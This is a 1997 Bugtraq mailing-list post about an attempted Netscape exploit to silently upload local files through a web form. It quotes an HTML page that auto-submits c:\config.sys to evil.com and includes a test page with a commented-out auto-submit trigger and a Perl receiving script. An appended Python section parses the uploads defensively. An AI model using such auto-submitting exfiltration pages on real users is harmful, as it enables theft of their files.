Bugtraq mailing list archives
Re: Netscape Exploit
From: brandon () VV COM (Micah Brandon)
Date: Sat, 14 Jun 1997 19:57:55 -0400
At 07:21 PM 6/14/97 -0500, root wrote:
> Here is a sample; it isn't complete, but you get the basic idea of what is
> going on.
>
> <HTML><HEAD><TITLE>Evil-DOT-COM Homepage</TITLE></HEAD>
> <BODY onLoad="daForm.submit()">
> <FORM
>   NAME="daForm"
>   ACTION="http://evil.com/cgi-bin/formmail.pl"
>   METHOD=POST>
> <INPUT TYPE=FILE VALUE="c:\config.sys" Name="Save This Document on your Harddrive">
> <INPUT TYPE=HIDDEN NAME="recipient" value="foobar () evil com">
>
> and so on and so forth...
Ah... this won't work, because you're onLoad'ing daForm before you've named
the form "daForm", plus the <INPUT TYPE=FILE...> line won't take a VALUE
attribute.
I've been hackin' at this, but I can't get it either. I can "see" the
value attribute being set but I don't think it's possible to change it with
Javascript. We're probably barking up the wrong tree. Anyway, take a look
at the code below. Perhaps someone can take it from here:
<HTML>
<HEAD>
<SCRIPT>
function ShowFilename() {
    // Uncomment this line and comment the alert line if you want this
    // script to "auto" submit
    // document.forms[0].submit();
    // Display filename
    alert(document.forms[0].userfile.value);
}
</SCRIPT>
<TITLE>
Netscape Bug Test Page
</TITLE>
</HEAD>
<BODY>
<CENTER>
<H2>Netscape Bug Test Page</H2>
<HR>
<FORM OnSubmit="ShowFilename()"
      ACTION="send.cgi"
      ENCTYPE="multipart/form-data"
      METHOD="POST">
<INPUT TYPE=FILE NAME=userfile>
<INPUT TYPE=SUBMIT VALUE="Send File">
</FORM>
<!--
of an image trigger the ShowFilename script.
Together with uncommenting the submit() line
in the ShowFilename script, the form above will
submit itself automatically.
<IMG OnLoad="ShowFilename()" SRC="pix.gif">
-->
<HR>
</CENTER>
</BODY>
</HTML>
And send.cgi is...
#!/usr/bin/perl
# CGI header (the browser renders the rest as HTML)
print "Content-type: text/html\n\n";
print "<H2>YOUR FILE</H2>";
print "<PRE>";
# Echo the raw multipart/form-data body back to the browser and keep a copy
while (<STDIN>) {
    $FILETEXT .= $_;
    print;
}
print "</PRE>";
# Save the file to your server as well
open(SOMEFILE, "> /tmp/fromweb") or die "cannot write /tmp/fromweb: $!";
print SOMEFILE $FILETEXT;
close(SOMEFILE);
---
micah
brandon () vv com
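What send.cgi gets on STDIN is the raw multipart/form-data body, which the script above simply echoes and writes to /tmp/fromweb. The following is an added example for this archive page, in Python rather than the thread's Perl, and not code from the thread or from Netscape: a minimal parser for that body, run against a constructed request resembling what the test page would POST for the userfile field (with root's hidden recipient field thrown in), plus a basename check before a client-supplied filename is ever reused on the server. The function names (parse_multipart, safe_filename, uploaded_files), the boundary string and the sample config.sys lines are all assumptions made for the example.

```python
"""Parse the multipart/form-data body a file-upload form POSTs to its ACTION
URL, which send.cgi above dumps raw.  Added example for this archive page, not
code from the thread; the request below is constructed, not captured."""
import re

# Constructed request (assumption): what the test page would POST if the user
# (or a script) had selected c:\config.sys in <INPUT TYPE=FILE NAME=userfile>,
# plus the hidden "recipient" field from root's sample.  Boundary is made up.
BOUNDARY = "---------------------------7d01ecf406a6"
SAMPLE_CONTENT_TYPE = "multipart/form-data; boundary=" + BOUNDARY
SAMPLE_BODY = (
    "--" + BOUNDARY + "\r\n"
    'Content-Disposition: form-data; name="recipient"\r\n'
    "\r\n"
    "foobar () evil com\r\n"
    "--" + BOUNDARY + "\r\n"
    'Content-Disposition: form-data; name="userfile"; filename="c:\\config.sys"\r\n'
    "Content-Type: application/octet-stream\r\n"
    "\r\n"
    "DEVICE=C:\\WINDOWS\\HIMEM.SYS\r\n"
    "FILES=40\r\n"
    "--" + BOUNDARY + "--\r\n"
).encode("latin-1")

_DISPOSITION_PARAM = re.compile(r';\s*([A-Za-z0-9_-]+)="([^"]*)"')


def boundary_from_content_type(content_type):
    """Pull the boundary out of a Content-Type header (CONTENT_TYPE env in CGI)."""
    m = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if not m:
        raise ValueError("not a multipart/form-data request: %r" % content_type)
    return m.group(2).encode("ascii")


def parse_multipart(content_type, body):
    """Split body into parts: dicts with name, filename, content_type, data.

    Layout per RFC 2046: --boundary CRLF headers CRLF CRLF data, repeated,
    terminated by --boundary-- .  The CRLF before each delimiter belongs to
    the delimiter, not to the data, so part data is returned without it.
    """
    delimiter = b"--" + boundary_from_content_type(content_type)
    pos = body.find(delimiter)
    if pos < 0:
        raise ValueError("boundary not found in body")
    pos += len(delimiter)
    parts = []
    while not body.startswith(b"--", pos):          # "--" here = closing delimiter
        if not body.startswith(b"\r\n", pos):
            raise ValueError("malformed delimiter line")
        pos += 2
        header_end = body.find(b"\r\n\r\n", pos)
        if header_end < 0:
            raise ValueError("part headers not terminated")
        headers = {}
        for line in body[pos:header_end].decode("latin-1").split("\r\n"):
            key, _, value = line.partition(":")
            headers[key.strip().lower()] = value.strip()
        data_start = header_end + 4
        next_delim = body.find(b"\r\n" + delimiter, data_start)
        if next_delim < 0:
            raise ValueError("part not terminated by a delimiter")
        params = dict(_DISPOSITION_PARAM.findall(headers.get("content-disposition", "")))
        parts.append({
            "name": params.get("name"),
            "filename": params.get("filename"),     # client-supplied, untrusted
            "content_type": headers.get("content-type"),
            "data": body[data_start:next_delim],
        })
        pos = next_delim + 2 + len(delimiter)
    return parts


def safe_filename(filename):
    """Browsers of the day sent the client's full path ("c:\\config.sys").
    Keep only the last component, for either separator, before reusing it on
    the server; send.cgi sidesteps this by writing to a fixed /tmp path."""
    if not filename:
        return "upload"
    return re.split(r"[\\/]", filename)[-1] or "upload"


def uploaded_files(parts):
    """(safe name, bytes) for every part that carried a filename."""
    return [(safe_filename(p["filename"]), p["data"])
            for p in parts if p["filename"] is not None]


if __name__ == "__main__":
    # A real CGI would use os.environ["CONTENT_TYPE"] and sys.stdin.buffer.read().
    for name, data in uploaded_files(parse_multipart(SAMPLE_CONTENT_TYPE, SAMPLE_BODY)):
        print("%s: %d bytes" % (name, len(data)))
```

The parser rejects a body whose boundary, part headers or closing delimiter are missing instead of silently returning a truncated part, and it never writes the decoded data back into the HTML response the way send.cgi does, so a file that happens to contain markup is not rendered by the browser that receives the echo.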